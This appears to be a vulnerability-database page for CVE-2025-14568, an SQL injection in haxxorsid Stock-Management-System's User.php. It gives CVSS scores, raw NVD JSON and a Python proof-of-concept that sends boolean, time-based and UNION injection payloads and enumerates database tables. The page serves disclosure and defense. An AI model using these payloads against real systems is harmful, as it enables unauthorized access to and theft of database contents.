Security Vulnerability Report
中文
CVE-2025-14568 CVSS 6.3 MEDIUM

CVE-2025-14568

Published: 2025-12-12 19:16:01
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security vulnerability has been detected in haxxorsid Stock-Management-System up to fbbbf213e9c93b87183a3891f77e3cc7095f22b0. This impacts an unknown function of the file model/User.php. The manipulation of the argument employee_id/id/admin leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Stock-Management-System <= fbbbf213e9c93b87183a3891f77e3cc7095f22b0
所有使用滚动发布模式的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14568 SQL Injection PoC # Target: haxxorsid Stock-Management-System # File: model/User.php # Vulnerable Parameter: employee_id, id, admin import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-url/index.php" # Replace with actual target URL def test_sql_injection(): """Test for SQL injection vulnerability in User.php""" # Test payload for boolean-based blind SQL injection payloads = [ # True condition - should return normal response "1' AND 1=1 -- ", # False condition - should return different response "1' AND 1=2 -- ", # Time-based blind SQL injection "1'; SLEEP(5) -- ", # UNION-based injection to extract database version "1' UNION SELECT NULL,version(),NULL -- " ] vulnerable_params = ['employee_id', 'id', 'admin'] print("[*] Testing CVE-2025-14568 SQL Injection") print(f"[*] Target: {TARGET_URL}") print("=" * 50) for param in vulnerable_params: print(f"\n[*] Testing parameter: {param}") # Test basic injection for i, payload in enumerate(payloads): data = {param: payload} try: response = requests.post( TARGET_URL, data=data, timeout=10, verify=False ) print(f"[+] Payload {i+1}: {payload[:30]}...") print(f" Status: {response.status_code}") print(f" Length: {len(response.text)}") except requests.exceptions.Timeout: print(f"[!] Time-based injection confirmed - request timed out") except Exception as e: print(f"[!] Error: {str(e)}") print("\n[*] Testing complete") print("[*] If vulnerabilities exist, modify payloads to extract data") def extract_data(): """Extract data using UNION-based SQL injection""" # Database enumeration payload union_payload = "1' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database() -- " print("\n[*] Extracting database information...") data = {'id': union_payload} try: response = requests.post(TARGET_URL, data=data, timeout=10) print(f"[*] Response length: {len(response.text)}") # Parse response to extract table names # (Implementation depends on actual application response format) except Exception as e: print(f"[!] Error: {str(e)}") if __name__ == "__main__": test_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14568", "sourceIdentifier": "[email protected]", "published": "2025-12-12T19:16:01.237", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in haxxorsid Stock-Management-System up to fbbbf213e9c93b87183a3891f77e3cc7095f22b0. This impacts an unknown function of the file model/User.php. The manipulation of the argument employee_id/id/admin leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://github.com/ixpqxi/CVE_LIST/blob/master/stock_management_system/sql_injection_vulnerability.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.336192", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.336192", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.703880", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.